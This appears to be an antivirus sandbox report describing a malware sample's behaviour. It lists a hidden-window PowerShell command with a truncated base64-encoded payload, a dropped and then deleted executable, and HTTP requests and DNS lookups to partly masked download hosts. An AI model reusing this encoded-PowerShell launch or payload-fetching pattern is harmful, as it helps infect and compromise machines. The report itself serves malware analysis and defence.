Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAkAG8AdwB1AGcAIAAgAD0AIAAgAFsAVABZAFAARQBdACgAIgB7ADIAfQB7ADEAfQB7ADMAfQB7ADQAfQB7ADAAfQAiAC0ARgAnAHkAJwAsACcALgBkAEkAUgBFAEMAJwAsACcAUwBZAHMAVABlAG0ALgBpAE8AJwAsACcAVA...
Modifies file system
Creates the following files
- %HOMEPATH%\l81m8yl\ror9uq9\brfjkw.exe
Deletes the following files
- %HOMEPATH%\l81m8yl\ror9uq9\brfjkw.exe
Network activity
TCP
HTTP GET requests
- http://ti####wntees.com/wp-content/TV/
- http://03##hhd.com/cgi-bin/ru/
- http://www.ea####gershop.com/wp-includes/css/GxWFH/M/
UDP
- DNS ASK ti####wntees.com
- DNS ASK 03##hhd.com
- DNS ASK ea####gershop.com
- DNS ASK pa###cial.org
- DNS ASK pr####igarettes.com
- DNS ASK ev###ahk.com
- DNS ASK ba####omnerds.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAkAG8AdwB1AGcAIAAgAD0AIAAgAFsAVABZAFAARQBdACgAIgB7ADIAfQB7ADEAfQB7ADMAfQB7ADQAfQB7ADAAfQAiAC0ARgAnAHkAJwAsACcALgBkAEkAUgBFAEMAJwAsACcAUwBZAHMAVABlAG0ALgBpAE8AJwAsACcAVA...' (with hidden window)
